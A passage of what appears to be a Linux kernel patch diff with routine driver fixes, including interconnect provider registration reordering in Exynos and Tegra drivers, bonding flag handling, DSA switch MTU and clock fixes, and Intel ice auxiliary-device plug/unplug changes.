+@@ -98,12 +98,13 @@ static int exynos_generic_icc_remove(struct platform_device *pdev)
+ 	struct exynos_icc_priv *priv = platform_get_drvdata(pdev);
+ 	struct icc_node *parent_node, *node = priv->node;
+ 
++	icc_provider_deregister(&priv->provider);
++
+ 	parent_node = exynos_icc_get_parent(priv->dev->parent->of_node);
+ 	if (parent_node && !IS_ERR(parent_node))
+ 		icc_link_destroy(node, parent_node);
+ 
+ 	icc_nodes_remove(&priv->provider);
+-	icc_provider_del(&priv->provider);
+ 
+ 	return 0;
+ }
+@@ -132,15 +133,11 @@ static int exynos_generic_icc_probe(struct platform_device *pdev)
+ 	provider->inter_set = true;
+ 	provider->data = priv;
+ 
+-	ret = icc_provider_add(provider);
+-	if (ret < 0)
+-		return ret;
++	icc_provider_init(provider);
+ 
+ 	icc_node = icc_node_create(pdev->id);
+-	if (IS_ERR(icc_node)) {
+-		ret = PTR_ERR(icc_node);
+-		goto err_prov_del;
+-	}
++	if (IS_ERR(icc_node))
++		return PTR_ERR(icc_node);
+ 
+ 	priv->node = icc_node;
+ 	icc_node->name = devm_kasprintf(&pdev->dev, GFP_KERNEL, "%pOFn",
+@@ -149,6 +146,9 @@ static int exynos_generic_icc_probe(struct platform_device *pdev)
+ 				 &priv->bus_clk_ratio))
+ 		priv->bus_clk_ratio = EXYNOS_ICC_DEFAULT_BUS_CLK_RATIO;
+ 
++	icc_node->data = priv;
++	icc_node_add(icc_node, provider);
++
+ 	/*
+ 	 * Register a PM QoS request for the parent (devfreq) device.
+ 	 */
+@@ -157,9 +157,6 @@ static int exynos_generic_icc_probe(struct platform_device *pdev)
+ 	if (ret < 0)
+ 		goto err_node_del;
+ 
+-	icc_node->data = priv;
+-	icc_node_add(icc_node, provider);
+-
+ 	icc_parent_node = exynos_icc_get_parent(bus_dev->of_node);
+ 	if (IS_ERR(icc_parent_node)) {
+ 		ret = PTR_ERR(icc_parent_node);
+@@ -171,14 +168,17 @@ static int exynos_generic_icc_probe(struct platform_device *pdev)
+ 			goto err_pmqos_del;
+ 	}
+ 
++	ret = icc_provider_register(provider);
++	if (ret < 0)
++		goto err_pmqos_del;
++
+ 	return 0;
+ 
+ err_pmqos_del:
+ 	dev_pm_qos_remove_request(&priv->qos_req);
+ err_node_del:
+ 	icc_nodes_remove(provider);
+-err_prov_del:
+-	icc_provider_del(provider);
++
+ 	return ret;
+ }
+ 
+diff --git a/drivers/md/Kconfig b/drivers/md/Kconfig
+index 998a5cfdbc4e9..662d219c39bf4 100644
+--- a/drivers/md/Kconfig
++++ b/drivers/md/Kconfig
+@@ -16,6 +16,10 @@ if MD
+ config BLK_DEV_MD
+ 	tristate "RAID support"
+ 	select BLOCK_HOLDER_DEPRECATED if SYSFS
++	# BLOCK_LEGACY_AUTOLOAD requirement should be removed
++	# after relevant mdadm enhancements - to make "names=yes"
++	# the default - are widely available.
++	select BLOCK_LEGACY_AUTOLOAD
+ 	help
+ 	  This driver lets you combine several hard disk partitions into one
+ 	  logical block device. This can be used to simply append one
+diff --git a/drivers/media/i2c/m5mols/m5mols_core.c b/drivers/media/i2c/m5mols/m5mols_core.c
+index 2201d2a26353a..c90442feb6dca 100644
+--- a/drivers/media/i2c/m5mols/m5mols_core.c
++++ b/drivers/media/i2c/m5mols/m5mols_core.c
+@@ -488,7 +488,7 @@ static enum m5mols_restype __find_restype(u32 code)
+ 	do {
+ 		if (code == m5mols_default_ffmt[type].code)
+ 			return type;
+-	} while (type++ != SIZE_DEFAULT_FFMT);
++	} while (++type != SIZE_DEFAULT_FFMT);
+ 
+ 	return 0;
+ }
+diff --git a/drivers/memory/tegra/mc.c b/drivers/memory/tegra/mc.c
+index 2f7a58a9df1ae..b38b565b308ec 100644
+--- a/drivers/memory/tegra/mc.c
++++ b/drivers/memory/tegra/mc.c
+@@ -769,16 +769,12 @@ static int tegra_mc_interconnect_setup(struct tegra_mc *mc)
+ 	mc->provider.aggregate = mc->soc->icc_ops->aggregate;
+ 	mc->provider.xlate_extended = mc->soc->icc_ops->xlate_extended;
+ 
+-	err = icc_provider_add(&mc->provider);
+-	if (err)
+-		return err;
++	icc_provider_init(&mc->provider);
+ 
+ 	/* create Memory Controller node */
+ 	node = icc_node_create(TEGRA_ICC_MC);
+-	if (IS_ERR(node)) {
+-		err = PTR_ERR(node);
+-		goto del_provider;
+-	}
++	if (IS_ERR(node))
++		return PTR_ERR(node);
+ 
+ 	node->name = "Memory Controller";
+ 	icc_node_add(node, &mc->provider);
+@@ -805,12 +801,14 @@ static int tegra_mc_interconnect_setup(struct tegra_mc *mc)
+ 			goto remove_nodes;
+ 	}
+ 
++	err = icc_provider_register(&mc->provider);
++	if (err)
++		goto remove_nodes;
++
+ 	return 0;
+ 
+ remove_nodes:
+ 	icc_nodes_remove(&mc->provider);
+-del_provider:
+-	icc_provider_del(&mc->provider);
+ 
+ 	return err;
+ }
+diff --git a/drivers/memory/tegra/tegra124-emc.c b/drivers/memory/tegra/tegra124-emc.c
+index 85bc936c02f94..00ed2b6a0d1b2 100644
+--- a/drivers/memory/tegra/tegra124-emc.c
++++ b/drivers/memory/tegra/tegra124-emc.c
+@@ -1351,15 +1351,13 @@ static int tegra_emc_interconnect_init(struct tegra_emc *emc)
+ 	emc->provider.aggregate = soc->icc_ops->aggregate;
+ 	emc->provider.xlate_extended = emc_of_icc_xlate_extended;
+ 
+-	err = icc_provider_add(&emc->provider);
+-	if (err)
+-		goto err_msg;
++	icc_provider_init(&emc->provider);
+ 
+ 	/* create External Memory Controller node */
+ 	node = icc_node_create(TEGRA_ICC_EMC);
+ 	if (IS_ERR(node)) {
+ 		err = PTR_ERR(node);
+-		goto del_provider;
++		goto err_msg;
+ 	}
+ 
+ 	node->name = "External Memory Controller";
+@@ -1380,12 +1378,14 @@ static int tegra_emc_interconnect_init(struct tegra_emc *emc)
+ 	node->name = "External Memory (DRAM)";
+ 	icc_node_add(node, &emc->provider);
+ 
++	err = icc_provider_register(&emc->provider);
++	if (err)
++		goto remove_nodes;
++
+ 	return 0;
+ 
+ remove_nodes:
+ 	icc_nodes_remove(&emc->provider);
+-del_provider:
+-	icc_provider_del(&emc->provider);
+ err_msg:
+ 	dev_err(emc->dev, "failed to initialize ICC: %d\n", err);
+ 
+diff --git a/drivers/memory/tegra/tegra20-emc.c b/drivers/memory/tegra/tegra20-emc.c
+index 25ba3c5e4ad6a..d1f01f80dcbdf 100644
+--- a/drivers/memory/tegra/tegra20-emc.c
++++ b/drivers/memory/tegra/tegra20-emc.c
+@@ -1034,15 +1034,13 @@ static int tegra_emc_interconnect_init(struct tegra_emc *emc)
+ 	emc->provider.aggregate = soc->icc_ops->aggregate;
+ 	emc->provider.xlate_extended = emc_of_icc_xlate_extended;
+ 
+-	err = icc_provider_add(&emc->provider);
+-	if (err)
+-		goto err_msg;
++	icc_provider_init(&emc->provider);
+ 
+ 	/* create External Memory Controller node */
+ 	node = icc_node_create(TEGRA_ICC_EMC);
+ 	if (IS_ERR(node)) {
+ 		err = PTR_ERR(node);
+-		goto del_provider;
++		goto err_msg;
+ 	}
+ 
+ 	node->name = "External Memory Controller";
+@@ -1063,12 +1061,14 @@ static int tegra_emc_interconnect_init(struct tegra_emc *emc)
+ 	node->name = "External Memory (DRAM)";
+ 	icc_node_add(node, &emc->provider);
+ 
++	err = icc_provider_register(&emc->provider);
++	if (err)
++		goto remove_nodes;
++
+ 	return 0;
+ 
+ remove_nodes:
+ 	icc_nodes_remove(&emc->provider);
+-del_provider:
+-	icc_provider_del(&emc->provider);
+ err_msg:
+ 	dev_err(emc->dev, "failed to initialize ICC: %d\n", err);
+ 
+diff --git a/drivers/memory/tegra/tegra30-emc.c b/drivers/memory/tegra/tegra30-emc.c
+index 9ba2a9e5316bd..1ea3792beb86d 100644
+--- a/drivers/memory/tegra/tegra30-emc.c
++++ b/drivers/memory/tegra/tegra30-emc.c
+@@ -1546,15 +1546,13 @@ static int tegra_emc_interconnect_init(struct tegra_emc *emc)
+ 	emc->provider.aggregate = soc->icc_ops->aggregate;
+ 	emc->provider.xlate_extended = emc_of_icc_xlate_extended;
+ 
+-	err = icc_provider_add(&emc->provider);
+-	if (err)
+-		goto err_msg;
++	icc_provider_init(&emc->provider);
+ 
+ 	/* create External Memory Controller node */
+ 	node = icc_node_create(TEGRA_ICC_EMC);
+ 	if (IS_ERR(node)) {
+ 		err = PTR_ERR(node);
+-		goto del_provider;
++		goto err_msg;
+ 	}
+ 
+ 	node->name = "External Memory Controller";
+@@ -1575,12 +1573,14 @@ static int tegra_emc_interconnect_init(struct tegra_emc *emc)
+ 	node->name = "External Memory (DRAM)";
+ 	icc_node_add(node, &emc->provider);
+ 
++	err = icc_provider_register(&emc->provider);
++	if (err)
++		goto remove_nodes;
++
+ 	return 0;
+ 
+ remove_nodes:
+ 	icc_nodes_remove(&emc->provider);
+-del_provider:
+-	icc_provider_del(&emc->provider);
+ err_msg:
+ 	dev_err(emc->dev, "failed to initialize ICC: %d\n", err);
+ 
+diff --git a/drivers/mmc/host/atmel-mci.c b/drivers/mmc/host/atmel-mci.c
+index bb9bbf1c927b6..dd18440a90c58 100644
+--- a/drivers/mmc/host/atmel-mci.c
++++ b/drivers/mmc/host/atmel-mci.c
+@@ -1817,7 +1817,6 @@ static void atmci_tasklet_func(struct tasklet_struct *t)
+ 				atmci_writel(host, ATMCI_IER, ATMCI_NOTBUSY);
+ 				state = STATE_WAITING_NOTBUSY;
+ 			} else if (host->mrq->stop) {
+-				atmci_writel(host, ATMCI_IER, ATMCI_CMDRDY);
+ 				atmci_send_stop_cmd(host, data);
+ 				state = STATE_SENDING_STOP;
+ 			} else {
+@@ -1850,8 +1849,6 @@ static void atmci_tasklet_func(struct tasklet_struct *t)
+ 				 * command to send.
+ 				 */
+ 				if (host->mrq->stop) {
+-					atmci_writel(host, ATMCI_IER,
+-					             ATMCI_CMDRDY);
+ 					atmci_send_stop_cmd(host, data);
+ 					state = STATE_SENDING_STOP;
+ 				} else {
+diff --git a/drivers/mmc/host/sdhci_am654.c b/drivers/mmc/host/sdhci_am654.c
+index c2333c7acac9b..101581d83982a 100644
+--- a/drivers/mmc/host/sdhci_am654.c
++++ b/drivers/mmc/host/sdhci_am654.c
+@@ -369,7 +369,7 @@ static void sdhci_am654_write_b(struct sdhci_host *host, u8 val, int reg)
+ 					MAX_POWER_ON_TIMEOUT, false, host, val,
+ 					reg);
+ 		if (ret)
+-			dev_warn(mmc_dev(host->mmc), "Power on failed\n");
++			dev_info(mmc_dev(host->mmc), "Power on failed\n");
+ 	}
+ }
+ 
+diff --git a/drivers/net/bonding/bond_main.c b/drivers/net/bonding/bond_main.c
+index fce9301c8ebbc..45d3cb557de73 100644
+--- a/drivers/net/bonding/bond_main.c
++++ b/drivers/net/bonding/bond_main.c
+@@ -1774,6 +1774,19 @@ void bond_lower_state_changed(struct slave *slave)
+ 		slave_err(bond_dev, slave_dev, "Error: %s\n", errmsg);	\
+ } while (0)
+ 
++/* The bonding driver uses ether_setup() to convert a master bond device
++ * to ARPHRD_ETHER, that resets the target netdevice's flags so we always
++ * have to restore the IFF_MASTER flag, and only restore IFF_SLAVE if it was set
++ */
++static void bond_ether_setup(struct net_device *bond_dev)
++{
++	unsigned int slave_flag = bond_dev->flags & IFF_SLAVE;
++
++	ether_setup(bond_dev);
++	bond_dev->flags |= IFF_MASTER | slave_flag;
++	bond_dev->priv_flags &= ~IFF_TX_SKB_SHARING;
++}
++
+ /* enslave device <slave> to bond device <master> */
+ int bond_enslave(struct net_device *bond_dev, struct net_device *slave_dev,
+ 		 struct netlink_ext_ack *extack)
+@@ -1865,10 +1878,8 @@ int bond_enslave(struct net_device *bond_dev, struct net_device *slave_dev,
+ 
+ 			if (slave_dev->type != ARPHRD_ETHER)
+ 				bond_setup_by_slave(bond_dev, slave_dev);
+-			else {
+-				ether_setup(bond_dev);
+-				bond_dev->priv_flags &= ~IFF_TX_SKB_SHARING;
+-			}
++			else
++				bond_ether_setup(bond_dev);
+ 
+ 			call_netdevice_notifiers(NETDEV_POST_TYPE_CHANGE,
+ 						 bond_dev);
+@@ -2288,9 +2299,7 @@ err_undo_flags:
+ 			eth_hw_addr_random(bond_dev);
+ 		if (bond_dev->type != ARPHRD_ETHER) {
+ 			dev_close(bond_dev);
+-			ether_setup(bond_dev);
+-			bond_dev->flags |= IFF_MASTER;
+-			bond_dev->priv_flags &= ~IFF_TX_SKB_SHARING;
++			bond_ether_setup(bond_dev);
+ 		}
+ 	}
+ 
+diff --git a/drivers/net/dsa/microchip/ksz_common.c b/drivers/net/dsa/microchip/ksz_common.c
+index c68f48cd1ec08..07f6776bba12b 100644
+--- a/drivers/net/dsa/microchip/ksz_common.c
++++ b/drivers/net/dsa/microchip/ksz_common.c
+@@ -272,7 +272,7 @@ static const u16 ksz8795_regs[] = {
+ 	[S_BROADCAST_CTRL]		= 0x06,
+ 	[S_MULTICAST_CTRL]		= 0x04,
+ 	[P_XMII_CTRL_0]			= 0x06,
+-	[P_XMII_CTRL_1]			= 0x56,
++	[P_XMII_CTRL_1]			= 0x06,
+ };
+ 
+ static const u32 ksz8795_masks[] = {
+diff --git a/drivers/net/dsa/mt7530.c b/drivers/net/dsa/mt7530.c
+index 1e0b8bcd59e6c..1757d6a2c72ae 100644
+--- a/drivers/net/dsa/mt7530.c
++++ b/drivers/net/dsa/mt7530.c
+@@ -430,8 +430,6 @@ mt7530_pad_clk_setup(struct dsa_switch *ds, phy_interface_t interface)
+ 	switch (interface) {
+ 	case PHY_INTERFACE_MODE_RGMII:
+ 		trgint = 0;
+-		/* PLL frequency: 125MHz */
+-		ncpo1 = 0x0c80;
+ 		break;
+ 	case PHY_INTERFACE_MODE_TRGMII:
+ 		trgint = 1;
+@@ -462,38 +460,40 @@ mt7530_pad_clk_setup(struct dsa_switch *ds, phy_interface_t interface)
+ 	mt7530_rmw(priv, MT7530_P6ECR, P6_INTF_MODE_MASK,
+ 		   P6_INTF_MODE(trgint));
+ 
+-	/* Lower Tx Driving for TRGMII path */
+-	for (i = 0 ; i < NUM_TRGMII_CTRL ; i++)
+-		mt7530_write(priv, MT7530_TRGMII_TD_ODT(i),
+-			     TD_DM_DRVP(8) | TD_DM_DRVN(8));
+-
+-	/* Disable MT7530 core and TRGMII Tx clocks */
+-	core_clear(priv, CORE_TRGMII_GSW_CLK_CG,
+-		   REG_GSWCK_EN | REG_TRGMIICK_EN);
+-
+-	/* Setup the MT7530 TRGMII Tx Clock */
+-	core_write(priv, CORE_PLL_GROUP5, RG_LCDDS_PCW_NCPO1(ncpo1));
+-	core_write(priv, CORE_PLL_GROUP6, RG_LCDDS_PCW_NCPO0(0));
+-	core_write(priv, CORE_PLL_GROUP10, RG_LCDDS_SSC_DELTA(ssc_delta));
+-	core_write(priv, CORE_PLL_GROUP11, RG_LCDDS_SSC_DELTA1(ssc_delta));
+-	core_write(priv, CORE_PLL_GROUP4,
+-		   RG_SYSPLL_DDSFBK_EN | RG_SYSPLL_BIAS_EN |
+-		   RG_SYSPLL_BIAS_LPF_EN);
+-	core_write(priv, CORE_PLL_GROUP2,
+-		   RG_SYSPLL_EN_NORMAL | RG_SYSPLL_VODEN |
+-		   RG_SYSPLL_POSDIV(1));
+-	core_write(priv, CORE_PLL_GROUP7,
+-		   RG_LCDDS_PCW_NCPO_CHG | RG_LCCDS_C(3) |
+-		   RG_LCDDS_PWDB | RG_LCDDS_ISO_EN);
+-
+-	/* Enable MT7530 core and TRGMII Tx clocks */
+-	core_set(priv, CORE_TRGMII_GSW_CLK_CG,
+-		 REG_GSWCK_EN | REG_TRGMIICK_EN);
+-
+-	if (!trgint)
++	if (trgint) {
++		/* Lower Tx Driving for TRGMII path */
++		for (i = 0 ; i < NUM_TRGMII_CTRL ; i++)
++			mt7530_write(priv, MT7530_TRGMII_TD_ODT(i),
++				     TD_DM_DRVP(8) | TD_DM_DRVN(8));
++
++		/* Disable MT7530 core and TRGMII Tx clocks */
++		core_clear(priv, CORE_TRGMII_GSW_CLK_CG,
++			   REG_GSWCK_EN | REG_TRGMIICK_EN);
++
++		/* Setup the MT7530 TRGMII Tx Clock */
++		core_write(priv, CORE_PLL_GROUP5, RG_LCDDS_PCW_NCPO1(ncpo1));
++		core_write(priv, CORE_PLL_GROUP6, RG_LCDDS_PCW_NCPO0(0));
++		core_write(priv, CORE_PLL_GROUP10, RG_LCDDS_SSC_DELTA(ssc_delta));
++		core_write(priv, CORE_PLL_GROUP11, RG_LCDDS_SSC_DELTA1(ssc_delta));
++		core_write(priv, CORE_PLL_GROUP4,
++			   RG_SYSPLL_DDSFBK_EN | RG_SYSPLL_BIAS_EN |
++			   RG_SYSPLL_BIAS_LPF_EN);
++		core_write(priv, CORE_PLL_GROUP2,
++			   RG_SYSPLL_EN_NORMAL | RG_SYSPLL_VODEN |
++			   RG_SYSPLL_POSDIV(1));
++		core_write(priv, CORE_PLL_GROUP7,
++			   RG_LCDDS_PCW_NCPO_CHG | RG_LCCDS_C(3) |
++			   RG_LCDDS_PWDB | RG_LCDDS_ISO_EN);
++
++		/* Enable MT7530 core and TRGMII Tx clocks */
++		core_set(priv, CORE_TRGMII_GSW_CLK_CG,
++			 REG_GSWCK_EN | REG_TRGMIICK_EN);
++	} else {
+ 		for (i = 0 ; i < NUM_TRGMII_CTRL; i++)
+ 			mt7530_rmw(priv, MT7530_TRGMII_RD(i),
+ 				   RD_TAP_MASK, RD_TAP(16));
++	}
++
+ 	return 0;
+ }
+ 
+@@ -2206,7 +2206,7 @@ mt7530_setup(struct dsa_switch *ds)
+ 
+ 	mt7530_pll_setup(priv);
+ 
+-	/* Enable Port 6 only; P5 as GMAC5 which currently is not supported */
++	/* Enable port 6 */
+ 	val = mt7530_read(priv, MT7530_MHWTRAP);
+ 	val &= ~MHWTRAP_P6_DIS & ~MHWTRAP_PHY_ACCESS;
+ 	val |= MHWTRAP_MANUAL;
+diff --git a/drivers/net/dsa/mv88e6xxx/chip.c b/drivers/net/dsa/mv88e6xxx/chip.c
+index 3b8b2d0fbafaf..3a6db36574ad7 100644
+--- a/drivers/net/dsa/mv88e6xxx/chip.c
++++ b/drivers/net/dsa/mv88e6xxx/chip.c
+@@ -3549,7 +3549,7 @@ static int mv88e6xxx_get_max_mtu(struct dsa_switch *ds, int port)
+ 		return 10240 - VLAN_ETH_HLEN - EDSA_HLEN - ETH_FCS_LEN;
+ 	else if (chip->info->ops->set_max_frame_size)
+ 		return 1632 - VLAN_ETH_HLEN - EDSA_HLEN - ETH_FCS_LEN;
+-	return 1522 - VLAN_ETH_HLEN - EDSA_HLEN - ETH_FCS_LEN;
++	return ETH_DATA_LEN;
+ }
+ 
+ static int mv88e6xxx_change_mtu(struct dsa_switch *ds, int port, int new_mtu)
+@@ -3557,6 +3557,17 @@ static int mv88e6xxx_change_mtu(struct dsa_switch *ds, int port, int new_mtu)
+ 	struct mv88e6xxx_chip *chip = ds->priv;
+ 	int ret = 0;
+ 
++	/* For families where we don't know how to alter the MTU,
++	 * just accept any value up to ETH_DATA_LEN
++	 */
++	if (!chip->info->ops->port_set_jumbo_size &&
++	    !chip->info->ops->set_max_frame_size) {
++		if (new_mtu > ETH_DATA_LEN)
++			return -EINVAL;
++
++		return 0;
++	}
++
+ 	if (dsa_is_dsa_port(ds, port) || dsa_is_cpu_port(ds, port))
+ 		new_mtu += EDSA_HLEN;
+ 
+@@ -3565,9 +3576,6 @@ static int mv88e6xxx_change_mtu(struct dsa_switch *ds, int port, int new_mtu)
+ 		ret = chip->info->ops->port_set_jumbo_size(chip, port, new_mtu);
+ 	else if (chip->info->ops->set_max_frame_size)
+ 		ret = chip->info->ops->set_max_frame_size(chip, new_mtu);
+-	else
+-		if (new_mtu > 1522)
+-			ret = -EINVAL;
+ 	mv88e6xxx_reg_unlock(chip);
+ 
+ 	return ret;
+diff --git a/drivers/net/ethernet/aquantia/atlantic/aq_ring.c b/drivers/net/ethernet/aquantia/atlantic/aq_ring.c
+index 25129e723b575..2dc8d215a5918 100644
+--- a/drivers/net/ethernet/aquantia/atlantic/aq_ring.c
++++ b/drivers/net/ethernet/aquantia/atlantic/aq_ring.c
+@@ -412,6 +412,25 @@ int aq_xdp_xmit(struct net_device *dev, int num_frames,
+ 	return num_frames - drop;
+ }
+ 
++static struct sk_buff *aq_xdp_build_skb(struct xdp_buff *xdp,
++					struct net_device *dev,
++					struct aq_ring_buff_s *buff)
++{
++	struct xdp_frame *xdpf;
++	struct sk_buff *skb;
++
++	xdpf = xdp_convert_buff_to_frame(xdp);
++	if (unlikely(!xdpf))
++		return NULL;
++
++	skb = xdp_build_skb_from_frame(xdpf, dev);
++	if (!skb)
++		return NULL;
++
++	aq_get_rxpages_xdp(buff, xdp);
++	return skb;
++}
++
+ static struct sk_buff *aq_xdp_run_prog(struct aq_nic_s *aq_nic,
+ 				       struct xdp_buff *xdp,
+ 				       struct aq_ring_s *rx_ring,
+@@ -431,7 +450,7 @@ static struct sk_buff *aq_xdp_run_prog(struct aq_nic_s *aq_nic,
+ 
+ 	prog = READ_ONCE(rx_ring->xdp_prog);
+ 	if (!prog)
+-		goto pass;
++		return aq_xdp_build_skb(xdp, aq_nic->ndev, buff);
+ 
+ 	prefetchw(xdp->data_hard_start); /* xdp_frame write */
+ 
+@@ -442,17 +461,12 @@ static struct sk_buff *aq_xdp_run_prog(struct aq_nic_s *aq_nic,
+ 	act = bpf_prog_run_xdp(prog, xdp);
+ 	switch (act) {
+ 	case XDP_PASS:
+-pass:
+-		xdpf = xdp_convert_buff_to_frame(xdp);
+-		if (unlikely(!xdpf))
+-			goto out_aborted;
+-		skb = xdp_build_skb_from_frame(xdpf, aq_nic->ndev);
++		skb = aq_xdp_build_skb(xdp, aq_nic->ndev, buff);
+ 		if (!skb)
+ 			goto out_aborted;
+ 		u64_stats_update_begin(&rx_ring->stats.rx.syncp);
+ 		++rx_ring->stats.rx.xdp_pass;
+ 		u64_stats_update_end(&rx_ring->stats.rx.syncp);
+-		aq_get_rxpages_xdp(buff, xdp);
+ 		return skb;
+ 	case XDP_TX:
+ 		xdpf = xdp_convert_buff_to_frame(xdp);
+diff --git a/drivers/net/ethernet/i825xx/sni_82596.c b/drivers/net/ethernet/i825xx/sni_82596.c
+index daec9ce04531b..54bb4d9a0d1ea 100644
+--- a/drivers/net/ethernet/i825xx/sni_82596.c
++++ b/drivers/net/ethernet/i825xx/sni_82596.c
+@@ -78,6 +78,7 @@ static int sni_82596_probe(struct platform_device *dev)
+ 	void __iomem *mpu_addr;
+ 	void __iomem *ca_addr;
+ 	u8 __iomem *eth_addr;
++	u8 mac[ETH_ALEN];
+ 
+ 	res = platform_get_resource(dev, IORESOURCE_MEM, 0);
+ 	ca = platform_get_resource(dev, IORESOURCE_MEM, 1);
+@@ -109,12 +110,13 @@ static int sni_82596_probe(struct platform_device *dev)
+ 		goto probe_failed;
+ 
+ 	/* someone seems to like messed up stuff */
+-	netdevice->dev_addr[0] = readb(eth_addr + 0x0b);
+-	netdevice->dev_addr[1] = readb(eth_addr + 0x0a);
+-	netdevice->dev_addr[2] = readb(eth_addr + 0x09);
+-	netdevice->dev_addr[3] = readb(eth_addr + 0x08);
+-	netdevice->dev_addr[4] = readb(eth_addr + 0x07);
+-	netdevice->dev_addr[5] = readb(eth_addr + 0x06);
++	mac[0] = readb(eth_addr + 0x0b);
++	mac[1] = readb(eth_addr + 0x0a);
++	mac[2] = readb(eth_addr + 0x09);
++	mac[3] = readb(eth_addr + 0x08);
++	mac[4] = readb(eth_addr + 0x07);
++	mac[5] = readb(eth_addr + 0x06);
++	eth_hw_addr_set(netdevice, mac);
+ 	iounmap(eth_addr);
+ 
+ 	if (netdevice->irq < 0) {
+diff --git a/drivers/net/ethernet/intel/i40e/i40e_main.c b/drivers/net/ethernet/intel/i40e/i40e_main.c
+index d30bc38725e97..da0cf87d3a1ca 100644
+--- a/drivers/net/ethernet/intel/i40e/i40e_main.c
++++ b/drivers/net/ethernet/intel/i40e/i40e_main.c
+@@ -15491,6 +15491,7 @@ static int i40e_init_recovery_mode(struct i40e_pf *pf, struct i40e_hw *hw)
+ 	int err;
+ 	int v_idx;
+ 
++	pci_set_drvdata(pf->pdev, pf);
+ 	pci_save_state(pf->pdev);
+ 
+ 	/* set up periodic task facility */
+diff --git a/drivers/net/ethernet/intel/ice/ice.h b/drivers/net/ethernet/intel/ice/ice.h
+index e04871379baad..ca6b877fdde81 100644
+--- a/drivers/net/ethernet/intel/ice/ice.h
++++ b/drivers/net/ethernet/intel/ice/ice.h
+@@ -485,6 +485,7 @@ enum ice_pf_flags {
+ 	ICE_FLAG_VF_VLAN_PRUNING,
+ 	ICE_FLAG_LINK_LENIENT_MODE_ENA,
+ 	ICE_FLAG_PLUG_AUX_DEV,
++	ICE_FLAG_UNPLUG_AUX_DEV,
+ 	ICE_FLAG_MTU_CHANGED,
+ 	ICE_FLAG_GNSS,			/* GNSS successfully initialized */
+ 	ICE_PF_FLAGS_NBITS		/* must be last */
+@@ -926,16 +927,11 @@ static inline void ice_set_rdma_cap(struct ice_pf *pf)
+  */
+ static inline void ice_clear_rdma_cap(struct ice_pf *pf)
+ {
+-	/* We can directly unplug aux device here only if the flag bit
+-	 * ICE_FLAG_PLUG_AUX_DEV is not set because ice_unplug_aux_dev()
+-	 * could race with ice_plug_aux_dev() called from
+-	 * ice_service_task(). In this case we only clear that bit now and
+-	 * aux device will be unplugged later once ice_plug_aux_device()
+-	 * called from ice_service_task() finishes (see ice_service_task()).
++	/* defer unplug to service task to avoid RTNL lock and
++	 * clear PLUG bit so that pending plugs don't interfere
+ 	 */
+-	if (!test_and_clear_bit(ICE_FLAG_PLUG_AUX_DEV, pf->flags))
+-		ice_unplug_aux_dev(pf);
+-
++	clear_bit(ICE_FLAG_PLUG_AUX_DEV, pf->flags);
++	set_bit(ICE_FLAG_UNPLUG_AUX_DEV, pf->flags);
+ 	clear_bit(ICE_FLAG_RDMA_ENA, pf->flags);
+ }
+ #endif /* _ICE_H_ */
+diff --git a/drivers/net/ethernet/intel/ice/ice_main.c b/drivers/net/ethernet/intel/ice/ice_main.c
+index 3c6bb3f9ac780..cfc57cfc46e42 100644
+--- a/drivers/net/ethernet/intel/ice/ice_main.c
++++ b/drivers/net/ethernet/intel/ice/ice_main.c
+@@ -2326,18 +2326,15 @@ static void ice_service_task(struct work_struct *work)
+ 		}
+ 	}
+ 
+-	if (test_bit(ICE_FLAG_PLUG_AUX_DEV, pf->flags)) {
+-		/* Plug aux device per request */
+-		ice_plug_aux_dev(pf);
++	/* unplug aux dev per request, if an unplug request came in
++	 * while processing a plug request, this will handle it
++	 */
++	if (test_and_clear_bit(ICE_FLAG_UNPLUG_AUX_DEV, pf->flags))
++		ice_unplug_aux_dev(pf);
+ 
+-		/* Mark plugging as done but check whether unplug was
+-		 * requested during ice_plug_aux_dev() call
+-		 * (e.g. from ice_clear_rdma_cap()) and if so then
+-		 * plug aux device.
+-		 */
+-		if (!test_and_clear_bit(ICE_FLAG_PLUG_AUX_DEV, pf->flags))
+-			ice_unplug_aux_dev(pf);
+-	}
++	/* Plug aux device per request */
++	if (test_and_clear_bit(ICE_FLAG_PLUG_AUX_DEV, pf->flags))
++		ice_plug_aux_dev(pf);
+ 
+ 	if (test_and_clear_bit(ICE_FLAG_MTU_CHANGED, pf->flags)) {
+ 		struct iidc_event *event;
+diff --git a/drivers/net/ethernet/intel/ice/ice_xsk.c b/drivers/net/ethernet/intel/ice/ice_xsk.c
+index 65468cdc25870..41ee081eb8875 100644
+--- a/drivers/net/ethernet/intel/ice/ice_xsk.c
++++ b/drivers/net/ethernet/intel/ice/ice_xsk.c
+@@ -173,8 +173,6 @@ static int ice_qp_dis(struct ice_vsi *vsi, u16 q_idx)
+ 	}
+ 	netif_tx_stop_queue(netdev_get_tx_queue(vsi->netdev, q_idx));
+ 
+-	ice_qvec_dis_irq(vsi, rx_ring, q_vector);
+-
+ 	ice_fill_txq_meta(vsi, tx_ring, &txq_meta);
+ 	err = ice_vsi_stop_tx_ring(vsi, ICE_NO_RESET, 0, tx_ring, &txq_meta);
+ 	if (err)
+@@ -189,10 +187,11 @@ static int ice_qp_dis(struct ice_vsi *vsi, u16 q_idx)
+ 		if (err)
+ 			return err;
+ 	}
++	ice_qvec_dis_irq(vsi, rx_ring, q_vector);
++
+ 	err = ice_vsi_ctrl_one_rx_ring(vsi, false, q_idx, true);
+ 	if (err)
+ 		return err;
+-	ice_clean_rx_ring(rx_ring);
+ 
+ 	ice_qvec_toggle_napi(vsi, q_vector, false);
+ 	ice_qp_clean_rings(vsi, q_idx);
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/en.h b/drivers/net/ethernet/mellanox/mlx5/core/en.h
+index 26a23047f1f3b..bc76fe6b06230 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/en.h
++++ b/drivers/net/ethernet/mellanox/mlx5/core/en.h
+@@ -313,7 +313,6 @@ struct mlx5e_params {
+ 		} channel;
+ 	} mqprio;
+ 	bool rx_cqe_compress_def;
+-	bool tunneled_offload_en;
+ 	struct dim_cq_moder rx_cq_moderation;
+ 	struct dim_cq_moder tx_cq_moderation;
+ 	struct mlx5e_packet_merge_param packet_merge;
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/en/tc_tun.c b/drivers/net/ethernet/mellanox/mlx5/core/en/tc_tun.c
+index e6f64d890fb34..83bb0811e7741 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/en/tc_tun.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/en/tc_tun.c
+@@ -745,8 +745,6 @@ int mlx5e_tc_tun_route_lookup(struct mlx5e_priv *priv,
+ 		if (err)
+ 			goto out;
+ 
